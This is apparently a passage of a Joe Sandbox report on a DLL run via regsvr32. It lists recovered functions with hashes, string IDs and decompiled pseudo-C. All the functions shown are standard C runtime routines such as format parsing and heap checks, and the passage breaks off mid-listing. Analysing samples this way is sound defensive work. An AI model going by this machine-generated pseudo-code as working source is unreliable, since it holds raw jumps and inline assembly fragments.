                                    • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 1967237116-569934968
                                    • Opcode ID: cc230896d9a9b78453caf74913fa4f6c5025a346ba52c0faae240e43dd1109e8
                                    • Instruction ID: 22a9a72b2ea07787f3d01dc0e5522a3b9409a08ca4ad9fd04da88529524a1eb4
                                    • Opcode Fuzzy Hash: cc230896d9a9b78453caf74913fa4f6c5025a346ba52c0faae240e43dd1109e8
                                    • Instruction Fuzzy Hash: B4D11D7260DBC58BE7B1CB65E8507AEB7E4F384785F200125EAC886AA9DB7DD540CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3BFDE Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 212COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E000007FE7FEF9D3BFDE(char _a696, char _a976) {

				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}



                                    0x7fef9d3bfe6
                                    0x7fef9d3bff7
                                    0x7fef9d3c006
                                    0x7fef9d3c02d

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: wctomb_s
                                    • String ID: $("Incorrect format specifier", 0)$7$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2215178078-1895985292
                                    • Opcode ID: 328cc2888182d49a31844c3056f2ccb27a85ea43ad5a4f85c1908e4795749c83
                                    • Instruction ID: 7adfc43390c165502d6a8fb190fde7d628b4034d943845d6c2f74ff038b9ebc8
                                    • Opcode Fuzzy Hash: 328cc2888182d49a31844c3056f2ccb27a85ea43ad5a4f85c1908e4795749c83
                                    • Instruction Fuzzy Hash: 64B12E7260C7C68AE7B1CB24E8457AEB7E4F384785F204125DAD987AA9DB7DD540CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D32260 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 185COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: ("Buffer too small", 0)$_vsprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL$string != NULL && sizeInBytes > 0
                                    • API String ID: 2123368286-348877268
                                    • Opcode ID: b6bbebb1f4d85d28a6809bfbee2de0be140824b02a8ca1d2541b9b7cfc6d5eb8
                                    • Instruction ID: 000baf689883631365c7c02d111a1b1a2de10ec58b0e6b3448400e9d2f0f3b8d
                                    • Opcode Fuzzy Hash: b6bbebb1f4d85d28a6809bfbee2de0be140824b02a8ca1d2541b9b7cfc6d5eb8
                                    • Instruction Fuzzy Hash: AE915C32E0CA428AE7A08B68E84476E77E0F394365F604625E7DD43AF8DB7ED544CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3BB66 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 137COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$(ch != _T('\0'))$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2192614184-4087627024
                                    • Opcode ID: 957d201a7f975e21043e4e8cb8b7cb2b2c46c9e35bbf440868bf758d6fc38531
                                    • Instruction ID: 7ef584807be417e268083fb343ad6d7be6558f6767769905c9ec51bf7eddb7ed
                                    • Opcode Fuzzy Hash: 957d201a7f975e21043e4e8cb8b7cb2b2c46c9e35bbf440868bf758d6fc38531
                                    • Instruction Fuzzy Hash: 61713A72A0D6C286E7F09B24E8947BEB7E4E384345F604126D6CD86AA9DB3ED541CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D30FD0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 124COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: dst != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\memcpy_s.c$memcpy_s$sizeInBytes >= count$src != NULL
                                    • API String ID: 2123368286-3692278645
                                    • Opcode ID: 401d9823d412221fb6395ed79c47aff3affb5440d9467cb4f29d8a138cee4ba4
                                    • Instruction ID: fae548ccfa44dfd2566f43a5020e02f413341588dce5173fb2663fa56b07ad66
                                    • Opcode Fuzzy Hash: 401d9823d412221fb6395ed79c47aff3affb5440d9467cb4f29d8a138cee4ba4
                                    • Instruction Fuzzy Hash: 18515C31A1C64686F7A08B54E8447AE77E5F384344FA04136E6CD43AB8DBBEE545CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2BC30 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free_base_malloc_base
                                    • String ID:
                                    • API String ID: 3824334587-0
                                    • Opcode ID: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                    • Instruction ID: 495d8382669efda2ae004298a380b2f700874c64e4d866c5cb6fbd4b09cb9029
                                    • Opcode Fuzzy Hash: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                    • Instruction Fuzzy Hash: AC312D3191D68285E7E49B60EC0437EA3E1F7853A4F214535A6DE466F5CFBEE4809B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D263E0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 143COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: Bad memory block found at 0x%p.$Bad memory block found at 0x%p.Memory allocated at %hs(%d).$_CrtMemCheckpoint$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$state != NULL
                                    • API String ID: 2123368286-817335350
                                    • Opcode ID: 79c801832210f02bb2549a70f13a14fc678dbb47873921c6f453ebac8324fa6a
                                    • Instruction ID: a7fd658f0f883f275d3cb6d605636d4d7d2232aae341650a7fa887ee8dadd8b1
                                    • Opcode Fuzzy Hash: 79c801832210f02bb2549a70f13a14fc678dbb47873921c6f453ebac8324fa6a
                                    • Instruction Fuzzy Hash: 80610B36A18B4186EB64CB59E89132EB7A0F385794F714126EBCD83BB4CB3ED441CB00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2CFF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 138COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E000007FE7FEF9D2CFF0(intOrPtr _a8) {
				intOrPtr _v24;
				long long _v48;
				long long _v64;
				intOrPtr _t21;

				_a8 = _t21;
				_v48 = 0;
				_v64 = 0;
				_v24 = _a8;
				_v24 = _v24 - 2;
				if (_v24 - 0x14 > 0) goto 0xf9d2d13e;
				goto __rax;
			}







                                    0x7fef9d2cff0
                                    0x7fef9d2cff8
                                    0x7fef9d2d000
                                    0x7fef9d2d010
                                    0x7fef9d2d01b
                                    0x7fef9d2d024
                                    0x7fef9d2d048

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: ("Invalid signal or error", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\winsig.c$raise
                                    • API String ID: 2123368286-2245755083
                                    • Opcode ID: ea92073534654960e4773f731c7ed7de4444a26fa1832afe31598046f11c2526
                                    • Instruction ID: 64874b8661254a0ae2b01e5280f4eb25b6cc5e7b5243a42f7df21d474b3e4b39
                                    • Opcode Fuzzy Hash: ea92073534654960e4773f731c7ed7de4444a26fa1832afe31598046f11c2526
                                    • Instruction Fuzzy Hash: 3871E83291C7868AE7A48B58E84436EB7E0F785754F214135E6CE47BA4DB3EE448CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D25AD9 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 77memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: HeapPointerValid
                                    • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$L7$LX
                                    • API String ID: 299318057-1988567080
                                    • Opcode ID: daa921bd4a8f87b13c34e3fb9a704e2154bbea7e848b38387929040681ee6967
                                    • Instruction ID: 749e228a184b7b5abc50e7f522a6a47edf15a58a7031c3663ed602be408c8cc7
                                    • Opcode Fuzzy Hash: daa921bd4a8f87b13c34e3fb9a704e2154bbea7e848b38387929040681ee6967
                                    • Instruction Fuzzy Hash: 28314D36A1864A85EBE48B59E84172E67D1F385784F714036EACD83BB5DB3FD440CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2C7E9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: EncodePointer$_realloc_dbg
                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\onexit.c$}
                                    • API String ID: 429494535-1858280179
                                    • Opcode ID: c2a3dc5e3c5b3ef6ce05fce9891920db6be9e05d2791cfb21aba20a8a533fa4f
                                    • Instruction ID: d34c943794379c2c172b76bd65526e764d0d85b1982d09e34a5c92bdfa9d3ddf
                                    • Opcode Fuzzy Hash: c2a3dc5e3c5b3ef6ce05fce9891920db6be9e05d2791cfb21aba20a8a533fa4f
                                    • Instruction Fuzzy Hash: 8141B836619A8586DA90CB59F88432EB7E4F7C9794F201025EACE43B68DF7ED4958B00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3E16F Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 259COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: get_int64_arg
                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 1967237116-734865713
                                    • Opcode ID: 3c24d1ab21f2eaa164015dd35ad3ad4baa8f1e206880d9711f96d4d726ca0df5
                                    • Instruction ID: a4401d07f2fb6cffb5d65cb91d5b1a1a6a6edb3a16c82fb832ec879f024f4c4f
                                    • Opcode Fuzzy Hash: 3c24d1ab21f2eaa164015dd35ad3ad4baa8f1e206880d9711f96d4d726ca0df5
                                    • Instruction Fuzzy Hash: 60D1CA72A0CAC686E7B18B55E8407AFB7E0F384355F600126E6D987AA9DB7DE440CF14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3DF8D Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 218COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E000007FE7FEF9D3DF8D(signed short _a1208, signed int _a1412) {

				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}



                                    0x7fef9d3df95
                                    0x7fef9d3dfa6
                                    0x7fef9d3dfb5
                                    0x7fef9d3dfdc

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ("Incorrect format specifier", 0)$7$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 0-1585035072
                                    • Opcode ID: 3ac2e27d66d95a25dfb2edd2f0848946df9d4bfe2e481795af5e1dbd4b0ec7bb
                                    • Instruction ID: 786758f90f15de6030b6b0b797e7a3976266de7f5bb6935df7b5cb31798ef030
                                    • Opcode Fuzzy Hash: 3ac2e27d66d95a25dfb2edd2f0848946df9d4bfe2e481795af5e1dbd4b0ec7bb
                                    • Instruction Fuzzy Hash: D0B1FD7260CAC286E7B1DB55E8417AFB7E0F784356F104126EAC987AA9DB7DE440CF10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D38350 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 178COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (count == 0) || (string != NULL)$(format != NULL)$_vswprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c
                                    • API String ID: 2123368286-1876092940
                                    • Opcode ID: 5533e41279f98ba4d4f5350db4eab6cd9eaa803fb231b9fee7a87e58e20f6e26
                                    • Instruction ID: 67313c86c0907fb9479329b5879005a062486a8a0ba054e26d823845a12987d7
                                    • Opcode Fuzzy Hash: 5533e41279f98ba4d4f5350db4eab6cd9eaa803fb231b9fee7a87e58e20f6e26
                                    • Instruction Fuzzy Hash: FA911E32618B85CAE7A48B15E84476E77E0F384795F208525E6DE87BB4DB3ED444CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3BE32 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 173COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E000007FE7FEF9D3BE32(signed int _a80, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096) {

				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}



                                    0x7fef9d3be3a
                                    0x7fef9d3be49
                                    0x7fef9d3be53
                                    0x7fef9d3be61
                                    0x7fef9d3be6b
                                    0x7fef9d3be71
                                    0x7fef9d3be84
                                    0x7fef9d3be91
                                    0x7fef9d3be9d
                                    0x7fef9d3bea5
                                    0x7fef9d3beae
                                    0x7fef9d3beb2
                                    0x7fef9d3bebb
                                    0x7fef9d3bed1
                                    0x7fef9d3bee2
                                    0x7fef9d3bef0
                                    0x7fef9d3befc
                                    0x7fef9d3bf04
                                    0x7fef9d3bf17
                                    0x7fef9d3bf28
                                    0x7fef9d3bf36
                                    0x7fef9d3bf42
                                    0x7fef9d3bf4a
                                    0x7fef9d3bf5a
                                    0x7fef9d3bf6a
                                    0x7fef9d3bf7a
                                    0x7fef9d3bf8a
                                    0x7fef9d3bf9a
                                    0x7fef9d3bfaa
                                    0x7fef9d3bfac
                                    0x7fef9d3bfae
                                    0x7fef9d3bfb9
                                    0x7fef9d3bfbe
                                    0x7fef9d3bfc7
                                    0x7fef9d3bfcb
                                    0x7fef9d3bfd1
                                    0x7fef9d3bfe6
                                    0x7fef9d3bff7
                                    0x7fef9d3c006
                                    0x7fef9d3c02d

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                    • API String ID: 530996419-3826063230
                                    • Opcode ID: ca0a1c3a4d76a0406b352d4f9ca239403a79a6076d76e868b137271f3bc4e837
                                    • Instruction ID: 94b803b8bf2c9d0da31cb8fabbb810b13218eabd765851e9cd54d2cd97e7a3d8
                                    • Opcode Fuzzy Hash: ca0a1c3a4d76a0406b352d4f9ca239403a79a6076d76e868b137271f3bc4e837
                                    • Instruction Fuzzy Hash: 46915E72A0D6C28AE3F18B54E88477EB7E4E381346F601026D7CD87AA9CB7ED5418F11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3DDE0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 173COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E000007FE7FEF9D3DDE0(signed int _a80, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544) {

				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}



                                    0x7fef9d3dde8
                                    0x7fef9d3ddf7
                                    0x7fef9d3de01
                                    0x7fef9d3de0f
                                    0x7fef9d3de19
                                    0x7fef9d3de1f
                                    0x7fef9d3de32
                                    0x7fef9d3de40
                                    0x7fef9d3de4c
                                    0x7fef9d3de54
                                    0x7fef9d3de5d
                                    0x7fef9d3de61
                                    0x7fef9d3de6a
                                    0x7fef9d3de80
                                    0x7fef9d3de91
                                    0x7fef9d3de9f
                                    0x7fef9d3deab
                                    0x7fef9d3deb3
                                    0x7fef9d3dec6
                                    0x7fef9d3ded7
                                    0x7fef9d3dee5
                                    0x7fef9d3def1
                                    0x7fef9d3def9
                                    0x7fef9d3df09
                                    0x7fef9d3df19
                                    0x7fef9d3df29
